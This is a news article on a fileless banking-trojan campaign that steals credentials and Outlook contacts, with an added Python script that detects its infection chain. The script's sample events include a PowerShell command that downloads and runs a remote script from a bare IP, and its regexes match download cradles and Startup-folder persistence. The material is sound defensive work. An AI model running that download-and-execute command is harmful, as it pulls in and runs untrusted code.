Security researchers have discovered a new fileless malware campaign aimed at stealing users' banking credentials and Outlook contacts.
The campaign was discovered by security researchers at Trend Micro and targets online banking users in Taiwan and Brazil.
The fileless malware, delivered with multiple .BAT attachments, is capable of opening a connection to an IP address, downloading a PowerShell script that carries a banking trojan payload, and installing a hack tool and an information stealer.
The malware attempts to steal the user's banking account details from the websites the user visited. In addition, it gathers business email addresses and tries to gain remote access to the target system.
Chain of Infection
Upon infection, the fileless banking trojan connects to a remote IP address to download PowerShell code and executables that in turn connect to other URLs.
In the next step, it drops a .LNK file in the Startup folder, forces the system to restart after 3 minutes, and creates a lock screen that forces the user to enter their username and password.
Using the system's own login security feature, it verifies the credentials entered and sends them to the command and control server. Immediately after this, it hides its malicious activity by deleting all files and folders it created in the Startup folder.
At the same time, another trojan opens Outlook, gathers the email addresses stored in it, and sends them to the command and control server.
Researchers also discovered that the malware installs the hack tool RADMIN and attempts to gain full access to the system. Once the user logs off, the attacker is able to access user logs, gain admin privileges, and shadow the user's on-screen activity.
After the reboot, once the user logs in, the malware deletes all the Google .LNK files, replaces them with malicious files, and hides as a Google Chrome extension.
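As an added example, not part of the original article or of Trend Micro's research, the chain above can be expressed as a simple correlation over endpoint telemetry: a PowerShell download from a bare IP address, a .LNK written to the Startup folder, a timed restart, and later deletion of that same Startup entry. The event record shape, the use of shutdown.exe for the timed restart, and the sample events themselves are constructed assumptions.

```python
import re

# Constructed Sysmon-style event records (hypothetical shape, not Trend Micro's data).
SAMPLE_EVENTS = [
    {"type": "process", "detail": "cmd.exe /c update.bat"},
    {"type": "process", "detail": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                                  ".DownloadString('http://192.0.2.10/p.ps1')\""},
    {"type": "file_create", "detail": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                                      r"\Start Menu\Programs\Startup\chrome.lnk"},
    {"type": "process", "detail": "shutdown.exe /r /t 180"},   # assumed 3-minute restart mechanism
    {"type": "file_delete", "detail": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
                                      r"\Start Menu\Programs\Startup\chrome.lnk"},
    {"type": "process", "detail": "notepad.exe"},
]

# Matchers for the four observable stages described in the infection chain.
STARTUP_LNK_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.IGNORECASE)
PS_DOWNLOAD_RE = re.compile(r"(?i)powershell.*(downloadstring|downloadfile|invoke-webrequest)")
BARE_IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
TIMED_RESTART_RE = re.compile(r"(?i)\bshutdown(\.exe)?\b.*\s/r\b")


def chain_stages(events):
    """Return the set of infection-chain stages observed in the event records."""
    stages = set()
    for ev in events:
        kind, detail = ev["type"], ev["detail"]
        if kind == "process" and PS_DOWNLOAD_RE.search(detail) and BARE_IP_RE.search(detail):
            stages.add("powershell_download_from_ip")
        elif kind == "file_create" and STARTUP_LNK_RE.search(detail):
            stages.add("lnk_in_startup")
        elif kind == "process" and TIMED_RESTART_RE.search(detail):
            stages.add("timed_restart")
        elif kind == "file_delete" and STARTUP_LNK_RE.search(detail):
            stages.add("startup_cleanup")
    return stages


def verdict(events, threshold=3):
    """Flag a host when at least `threshold` distinct stages of the chain appear together."""
    stages = chain_stages(events)
    return len(stages) >= threshold, stages


if __name__ == "__main__":
    print(verdict(SAMPLE_EVENTS))
```

Any single stage (a Startup .LNK, a restart) is common on its own; requiring several of them together is what keeps the false-positive rate manageable.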
“In addition to stealing online banking credentials and remotely accessing systems, gathered email addresses of businesses’ and users’ contacts can be used for mass mail targeted attacks. In potentially having large directories of email addresses to choose from as targets, spoofing roles for phishing and BEC campaigns can incur more losses for legitimate users and business owners,” Trend Micro researchers said in their post.